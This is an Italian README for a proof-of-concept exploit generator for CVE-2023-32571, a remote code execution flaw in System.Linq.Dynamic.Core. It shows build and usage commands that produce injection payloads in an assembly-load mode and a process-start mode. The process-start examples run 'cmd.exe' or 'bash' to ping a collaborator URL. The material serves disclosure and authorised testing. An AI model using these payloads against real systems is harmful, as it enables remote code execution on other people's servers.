
Prova di concetto per CVE-2023-32571
Proof of Concept per CVE-2023-32571, una vulnerabilità di esecuzione di codice remoto in System.Linq.Dynamic.Core (dalla versione 1.0.7.10 alla 1.2.25). Questa vulnerabilità consente a un aggressore di eseguire codice e comandi arbitrari quando input non fidati vengono analizzati da metodi tra cui Where, Select, OrderBy.
Questo strumento è fornito solo per scopi educativi e di test autorizzati. L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.
dotnet build --configuration Release
Payload/bin/Release/netstandard2.0/Payload.dllGenerator/bin/Release/net9.0/Generator.dllLo strumento supporta due modalità:
# Using Base64 encoding
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 1
# Using Hex encoding
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 0
# Using Base64 encoding
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 1
# Using Hex encoding
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 0
# Windows command execution
./Generator --mode 1 --parameters "cmd.exe /c ping <your-collaborator-url>"
# Linux command execution
./Generator --mode 1 --parameters "bash -c ping <your-collaborator-url>"
--mode: Modalità di sfruttamento (0=AssemblyLoad, 1=ProcessStart)--file: Percorso dell'assembly .NET da caricare (richiesto per la modalità AssemblyLoad)--type: Nome del tipo completamente qualificato da istanziare (richiesto per la modalità AssemblyLoad)--parameters: Parametri in base alla modalità:
--encoding: Metodo di codifica per la modalità AssemblyLoad (0=Hex, 1=Base64)